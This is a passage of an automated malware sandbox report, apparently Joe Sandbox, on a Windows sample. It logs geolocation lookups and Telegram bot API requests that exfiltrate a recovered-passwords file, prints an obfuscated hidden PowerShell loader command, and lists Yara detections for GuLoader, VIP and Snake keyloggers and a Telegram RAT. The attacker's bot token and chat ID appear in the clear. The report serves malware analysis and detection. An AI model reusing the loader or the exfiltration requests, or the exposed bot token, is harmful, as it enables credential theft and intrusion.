                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1477&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1914754&cwnd=173&unsent_bytes=0&cid=18a4a8c806172bdd&ts=450&x=0"
                                                                                                                                                        2024-12-19 07:19:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        8192.168.2.449876172.67.177.1344432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:19:54 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-12-19 07:19:54 UTC884INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:54 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 581563
                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BRjgvM5%2FuHP8NTFU%2Fg04SEfuw%2FgEu0PxlS9MRNwD6KQDacahLtvn8XOe%2FxN7fTlkfTj%2BDlYAfPaW6QoGPEJGQEDUJMf10t6lYcSURhD3cuL7QyhslDJ51%2FsIljbXPvXuYUyO6DU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f45a085ad3d41ef-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1752&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1660034&cwnd=198&unsent_bytes=0&cid=49041e2393dcda6d&ts=448&x=0"
                                                                                                                                                        2024-12-19 07:19:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        9192.168.2.449883172.67.177.1344432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:19:57 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2024-12-19 07:19:57 UTC884INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:19:57 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 581566
                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UzpyO5UH%2BNJgOZu5VD7SHZ6cFxT%2F5zw8A%2FZNL2uyccV%2FRUtLOSMWSP1zjf4Wo%2FGNZiovqlR0aEoXj8c9O9UhSb0%2BxJWwdLtO9hYBqQHNftqBqmNe%2BTxAxGu9eQo42FDSILFUh51b"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f45a097ad48238e-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1911&rtt_var=732&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1479979&cwnd=232&unsent_bytes=0&cid=ac402a622babfe24&ts=448&x=0"
                                                                                                                                                        2024-12-19 07:19:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        10192.168.2.449895172.67.177.1344432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:19:59 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-19 07:20:00 UTC876INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:20:00 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Age: 581569
                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utWZ9EO1dsIGx1SRNJ%2Bb2vD7FnWt5Je6XA2lHy%2B0ucCjKmi6sG6WoyHjcaeXNdBtqw60bIYdLJLeD94h903J1RCAKwDr4a3DFsoqN%2BKNyqFPzjOOfGnbo0cL5ja9hdQM2H7wXLNG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f45a0a9bea51819-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1477&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1899804&cwnd=215&unsent_bytes=0&cid=e21632e54d480ee2&ts=451&x=0"
                                                                                                                                                        2024-12-19 07:20:00 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        11192.168.2.449897149.154.167.2204432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:20:02 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2020/12/2024%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2024-12-19 07:20:02 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:20:02 GMT
                                                                                                                                                        Content-Type: application/json
                                                                                                                                                        Content-Length: 55
                                                                                                                                                        Connection: close
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                        2024-12-19 07:20:02 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        12192.168.2.449917149.154.167.2204432720C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-19 07:20:12 UTC344OUTPOST /bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434550993&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2148b155d302
                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                        Content-Length: 581
                                                                                                                                                        2024-12-19 07:20:12 UTC581OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 34 38 62 31 35 35 64 33 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 32 37 35 33 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 31 32 2f 32 30 32 34 20 2f 20 30 32 3a 31 39 3a 33 32 0d
                                                                                                                                                        Data Ascii: --------------------------8dd2148b155d302Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:927537Date and Time: 19/12/2024 / 02:19:32
                                                                                                                                                        2024-12-19 07:20:13 UTC388INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                        Date: Thu, 19 Dec 2024 07:20:12 GMT
                                                                                                                                                        Content-Type: application/json
                                                                                                                                                        Content-Length: 538
                                                                                                                                                        Connection: close
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                        2024-12-19 07:20:13 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 35 37 32 30 33 34 32 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 6d 6f 63 68 69 61 6b 61 6d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6f 6d 6f 63 68 69 61 6b 61 6d 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 34 33 34 35 35 30 39 39 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6c 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 65 78 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4a 75 6c 69 65 74 73 65 78 79 39 31 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 39 32 38
                                                                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":139,"from":{"id":7557203423,"is_bot":true,"first_name":"Momochiakam","username":"Momochiakambot"},"chat":{"id":5434550993,"first_name":"Juli","last_name":"Sexy","username":"Julietsexy911","type":"private"},"date":17345928


                                                                                                                                                        Click to jump to process

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:02:18:03
                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\66776676676.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\66776676676.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:571'408 bytes
                                                                                                                                                        MD5 hash:A30468384472782C5B2FC6A439F641BB
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:1
                                                                                                                                                        Start time:02:18:04
                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) "
                                                                                                                                                        Imagebase:0xb10000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2439189486.000000000A1E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:02:18:04
                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:6
                                                                                                                                                        Start time:02:19:13
                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                        Imagebase:0x4d0000
                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:false

                                                                                                                                                        Reset < >